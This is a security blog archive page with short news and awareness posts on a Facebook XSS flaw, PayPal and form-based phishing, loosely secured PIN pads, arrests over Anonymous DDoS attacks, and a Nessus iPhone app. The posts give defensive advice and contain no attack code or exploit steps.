The Security Pub

Random Thoughts About Security

Category Archives: Vulnerabilities

Facebook Vulnerability

There is currently an unpatched XSS vulnerability in the mobile API version of Facebook that is currently being exploited to post messages to users’ Walls, which serves as a gateway to the specially crafted website exploiting the flaw.

The flaw has been misused for a while now, but has only recently been used widely. Indonesian users are currently targeted by various groups using the vulnerability to their advantage.

It allows any website to include, for example, a maliciously prepared iframe element that contains JavaScript or use the http-equiv attribute’s “refresh” value to redirect the browser to the prepared URL containing the JavaScript,” explains Symantec. “Any user who is logged into Facebook and visits a site that contains such an element will automatically post an arbitrary message to his or her wall.

No user interaction is needed, so the messages are spreading through Facebook at a fast pace. Facebook’s security team has been notified about the vulnerability and is working on a fix. Hopefully it will be issued soon, since the attack seems easy to recreate.
Symantec advises users to log out of Facebook when they are not actively using it or to use script-blocking add-ons to prevent the attack.

Phishing Scams are on the Rise

“Phishing” is where fraudsters send spam or pop-up messages to lure recipients into volunteering personal, financial or credential-related information from unsuspecting victims. That information can then be used to commit identity theft, or enter password-protected sites using your account. As phishing schemes become more sophisticated, it becomes increasingly important to be vigilant.

Learn more about how to spot a bogus phishing message, the important steps you can take to avoid getting “hooked,” and what to do if you’ve mistakenly responded to a phishing email with your personal information.

[box type="info"]The “Dos, Don’ts and Nevers” of Phishing

  1. DO Delete suspicious messages immediately.
  2. DON’T click on any links in the message.
  3. Instead, DO copy and paste the URL into a new browser window.
  4. NEVER respond to an unsolicited email, or supply personal information as requested by an email, even if the message looks real.
  5. NEVER supply your passwords or other sensitive information via an email message. No legitimate organization should request your password or other types of sensitive information via an email message.[/box]

What to do if you’re compromised

If you believe you might have inadvertently revealed sensitive information such as your password, you should change your password immediately.

If you provided personal financial accounts information that could be used for identity theft or fraud in response to a fraudulent e-mail claiming to be sent by outside agencies, you should immediately contact the company being spoofed.

Paypal Phishing Has Gone Multilingual

A recent report compiled by OpenDNS showed that 45 percent of all phishing attempts made in 2010 were targeting PayPal customers.

It is no wonder then that we witness PayPal phishing attempts on an almost daily basis. The latest one – spotted by Avira – comes in two flavors: English and French.

The e-mail itself is practically identical – the only difference is that in the English version takes the victim to the phishing page via a link, and the French version employs a button. Even the reference number cited in the e-mail is the same.

The e-mail also contains security tips that if followed it would thwart the phishers’ plans. I guess they thought the inclusion would make the e-mail look more legitimate and decided to bet on the fact that many people simply ignore such advice and follow the offered link/button.

PIN Pad Physical Security

So I was at the grocery store this evening (I won’t mention which one) . When I was paying for my groceries with my credit card I noticed how the PIN pad was secured.  Can you see what’s wrong with this picture?

If you are having difficulties identifying what’s wrong I will go ahead and explain…

This grocery store has decided to secure all their pin pads to the stand with zip ties.  I did take a look underneath the device and there wasn’t any screws mounting the device to the stand.  So if a hacker wanted to they could easily remove and replace these PIN pads with modified versions.

Here are some examples of good security for physically securing PIN pads.

5 men arrested in relation to Anonymous DDoS attacks

Five men believed to have taken part in recent Anonymous’ DDoS attacks have been arrested this morning during a series of raids coordinated by the Metropolitan Police Service’s Police Central e-Crime Unit.

The arrested males – ages are 15, 16, 19, 20 and 26 and have been taken to their local police stations in West Midlands, Northants, Herts, Surrey and London and are currently still in custody, said the police.

They are likely to be charged with offenses under the Computer Misuse Act 1990.

They have probably been tracked down by the police because they have been using Anonymous’ LOIC tool to DDoS various sites – a tool that has been proved to actually not to be able to completely anonymize its users’ involvement.

The arrests are the results of a months’ old investigation that the Metropolitan Police has mounted with the help of law enforcement agencies from the US and various Europe countries.

Form Based Phishing Attacks are on the RISE

As always, spammers are keeping abreast with the important events of the season’s, and know that January is when the public usually submits tax returns and starts getting refunds. Websense is reporting that the form-based approach is being used more frequently than the usual direct links to phishing sites.

What are form-based email attacks?

Form-based attacks is just another type of phishing attack.  Instead of using a link to take the user to a phishing site, the hacker includes a form that the user is asked to complete. When the user completes the form and submits it, the details are then sent to the attacker. Here is a short video that shows an example.

Nessus iPhone Application

Tenable has released a free iPhone application for its Nessus Vulnerability Scanner.  This iPhone application provides Nessus users the ability to:

  • Connect to a Nessus server
  • Launch scans
  • Create new scans
  • Review reports

All you will need is an iPhone or iPod Touch running iOS 4.0 or later.  You can download the Nessus iPhone application in the App Store, under the productivity category